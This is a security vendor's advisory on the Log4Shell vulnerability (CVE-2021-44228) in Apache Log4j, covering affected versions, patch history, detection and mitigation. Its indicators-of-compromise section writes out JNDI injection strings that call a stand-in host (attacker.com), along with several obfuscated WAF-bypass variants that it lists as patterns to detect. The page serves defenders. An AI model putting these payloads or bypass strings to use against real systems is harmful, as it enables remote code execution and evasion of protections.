Protect What Matters
Secure endpoints, email, and employees with the power of our 24/7 SOC. Try Huntress for free and deploy in minutes to start fighting threats.
CVE-2021-44228 Vulnerability
Written by: Monica Burgess
Published: 11/7/2025
What is CVE-2021-44228 Vulnerability?
A critical remote code execution (RCE) vulnerability in Apache Log4j 2, a popular Java logging library. Nicknamed Log4Shell, it allows an attacker to execute arbitrary code on a server by sending a specially crafted log message. It’s one of the most severe vulnerabilities ever discovered, earning a CVSS score of 10.0 out of 10.0.
When was it Discovered?
The CVE-2021-44228 vulnerability was publicly disclosed on December 9, 2021. It was originally discovered by Chen Zhaojun of Alibaba Cloud Security Team and reported to Apache on November 24, 2021. The public release triggered a massive, worldwide scramble as organizations rushed to understand their exposure and apply patches.
Affected Products & Versions
Log4Shell impacted a massive range of software and services that used the Apache Log4j 2 library. The scope was so vast because Log4j is a foundational component in countless Java-based applications, from enterprise software to cloud services.
|
Product/Library |
Versions Affected |
Fixed Versions / Patch Links |
|
Apache Log4j 2 |
2.0-beta9 through 2.14.1 |
2.17.1 (Java 8+), 2.12.4 (Java 7), 2.3.2 (Java 6) |
|
Apache Struts 2 |
2.5 - 2.5.29 (versions bundling Log4j 2 prior to 2.17.1) |
2.5.30+ (upgrades bundled Log4j); older branches: update Log4j directly |
|
Apache Solr |
8.11.0 and earlier |
8.11.1 |
|
Apache Druid |
0.22.0 and earlier |
0.22.1 |
|
VMware vCenter |
6.5, 6.7, 7.0 |
Patched versions & workarounds |
|
Minecraft: Java Edition |
All versions from 1.7 to 1.18 |
1.18.1 and later |
Important — Log4Shell patching requires 2.17.1, not 2.15.0: The patching history for CVE-2021-44228 involved four successive releases, each addressing a newly discovered related vulnerability. Patching only to 2.15.0 is insufficient:
- 2.15.0 (Dec 10, 2021): Partially mitigated CVE-2021-44228 but left CVE-2021-45046 open (RCE in certain non-default configurations)
- 2.16.0 (Dec 14, 2021): Fixed CVE-2021-45046, disabled JNDI by default, but introduced CVE-2021-45105 (denial of service via uncontrolled recursion)
- 2.17.0 (Dec 18, 2021): Fixed CVE-2021-45105 but left CVE-2021-44832 open (RCE via malicious JDBC Appender configuration)
- 2.17.1 (Jan 4, 2022): Fully remediated. This is the minimum safe version for Java 8+ environments
CVE-2021-44228 Technical Description
The root cause of the CVE-2021-44228 vulnerability lies in how Log4j processes log messages. The library supported a feature called "message lookup substitution," which allowed certain strings in logs to be replaced with dynamically generated values. One of these lookup methods was the Java Naming and Directory Interface (JNDI).
Attackers found that they could craft a malicious string, like ${jndi:ldap://attacker.com/a}, and get it logged by a vulnerable application. When Log4j processed this log, it would interpret the JNDI lookup, connect to the attacker-controlled LDAP server, and download and execute a malicious Java class. This gives the attacker a foothold for remote code execution. Because applications log all sorts of user-provided data (like User-Agent headers or form submissions), creating a CVE-2021-44228 exploit was frighteningly simple.
Tactics, Techniques & Procedures (TTPs)
Threat actors went wild with this one. Initial TTPs involved widespread scanning to find vulnerable endpoints. Once an entry point was found, attackers used the CVE-2021-44228 exploit to drop ransomware, install cryptominers, steal credentials, and establish persistent backdoors for later access. Many nation-state actors and cybercrime groups quickly integrated Log4Shell into their playbooks, using it as the initial access vector for broader campaigns.
Indicators of Compromise
Detecting a Log4Shell attack involves looking for specific patterns in your logs. The most obvious CVE-2021-44228 vulnerability indicators of compromise (IOCs) are log entries containing the ${jndi:} string, especially with protocols like ldap, ldaps, or rmi. You should also monitor for suspicious outbound network connections from your application servers to unusual IP addresses or domains, as this could indicate a successful JNDI lookup callback.
Obfuscation bypass variants to detect: Attackers rapidly developed obfuscated JNDI strings to evade WAF rules and log-based string matching. Your detection rules should account for the following patterns in addition to the basic ${jndi:} string:
${${lower:j}ndi:ldap://attacker.com/a}— lowercase lookup bypass${${upper:j}ndi:ldap://attacker.com/a}— uppercase variant${j${::-n}di:ldap://attacker.com/a}— partial substitution bypass${jndi:${lower:l}${lower:d}a${lower:p}://attacker.com/a}— protocol obfuscation
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a} — nested substitution bypass
Detection rules matching only the literal string ${jndi:ldap will miss these. Use broader pattern matching on jndi combined with any URI protocol indicator, or deploy purpose-built Log4Shell detection signatures from CISA's advisory (AA21-356A).
Known Proof-of-Concepts & Exploits
Within hours of disclosure, multiple CVE-2021-44228 proof of concept (PoC) exploits became publicly available on platforms like GitHub. This dramatically lowered the barrier to entry, enabling even less-skilled attackers to leverage the flaw. The high exploitability led to mass exploitation campaigns by botnets like Mirai and Kinsing, which used Log4Shell to propagate and install malware. Security researchers also developed PoCs to help defenders test their own systems for vulnerabilities.
How to Detect CVE-2021-44228 Vulnerability?
CVE-2021-44228 vulnerability detection requires a multi-layered approach. Start by scanning your environment for applications using vulnerable versions of the Log4j 2 library. Host-based detection tools can identify the presence of these libraries on disk. For active threats, your Security Information and Event Management (SIEM) system is key. Ingest web server logs, application logs, and firewall logs, and create rules to alert on strings like ${jndi:} or on outbound connections from application servers over protocols like LDAP or RMI. Sample queries might look for *jndi:ldap* or *jndi:rmi* in HTTP request fields. A robust Endpoint Detection and Response (EDR) solution can also help spot post-exploitation activity.
Impact & Risk of CVE-2021-44228 Vulnerability
The impact of Log4Shell was catastrophic. Its simplicity and the widespread use of Log4j meant that millions of servers were instantly at risk. A successful exploit grants an attacker full control over the affected system, compromising data confidentiality, integrity, and availability. Attackers could steal sensitive data, deploy ransomware to encrypt entire networks, or use the compromised server as a pivot point to move deeper into a corporate network. The business risk was immense, leading to service downtime, costly incident response efforts, and severe reputational damage.
Mitigation & Remediation Strategies
The primary CVE-2021-44228 vulnerability mitigation is to patch affected systems immediately. Update any instance of Apache Log4j to version 2.17.1 or newer — this is the minimum safe version for Java 8+ environments and fully remediates all known Log4Shell-family vulnerabilities.
⚠️ Important: Patching to 2.15.0 is not sufficient. The fix for Log4Shell required four successive releases, each addressing a newly discovered related vulnerability:
- 2.15.0 (Dec 10, 2021) — Partially mitigated CVE-2021-44228 but remained vulnerable in certain non-default configurations (CVE-2021-45046)
- 2.16.0 (Dec 14, 2021) — Fixed CVE-2021-45046 and disabled JNDI by default, but introduced a denial-of-service vulnerability (CVE-2021-45105)
- 2.17.0 (Dec 18, 2021) — Fixed CVE-2021-45105 but left a configuration-based RCE vulnerability open (CVE-2021-44832)
- 2.17.1 (Jan 4, 2022) — Fully patched. This is the version you should target.
For Java 7 environments, use 2.12.4. For Java 6, use 2.3.2.
If you can't patch right away, a few temporary fixes exist:
- Set the Log4j system property
log4j2.formatMsgNoLookupstotrue. Note: this only mitigates CVE-2021-44228 and does not address CVE-2021-45046. - Remove the JndiLookup class from the Log4j classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class - Deploy WAF rules blocking
${jndi:strings in HTTP headers, URI parameters, and POST bodies. - Apply egress filtering to block outbound LDAP (port 389/636) and RMI (port 1099) from application servers — this prevents the JNDI callback even if an exploit string reaches the logger.
However, these are stopgap measures. The only real long-term solution is applying the CVE-2021-44228 patch and upgrading to 2.17.1 or newer. A strong defense-in-depth strategy, including network segmentation and egress filtering, can also limit the blast radius if an exploit does occur.
CVE-2021-44228 Vulnerability FAQs
CVE-2021-44228, or Log4Shell, is a critical remote code execution vulnerability in the Apache Log4j logging library. It works by tricking the application into processing a malicious log message containing a JNDI lookup. This causes the server to connect to an attacker-controlled address and execute malicious code.
Infection occurs when a vulnerable application logs user-controlled input that contains a malicious JNDI string. An attacker can inject this string into common fields like HTTP headers, search bars, or login forms. Once the server logs the string, the vulnerability is triggered, and the system becomes compromised.
Yes, it absolutely is. While many organizations patched their systems in 2021 and 2022, countless unmanaged or forgotten applications still run vulnerable versions of Log4j. Threat actors continue to scan for and exploit these unpatched systems, making ongoing vigilance and patching a necessity.
The best protection is to update all instances of Log4j to version 2.17.1 or newer. Organizations should also use software composition analysis (SCA) tools to identify all applications using the library. Additionally, implementing egress filtering to block outbound LDAP and RMI traffic can help prevent successful exploitation.
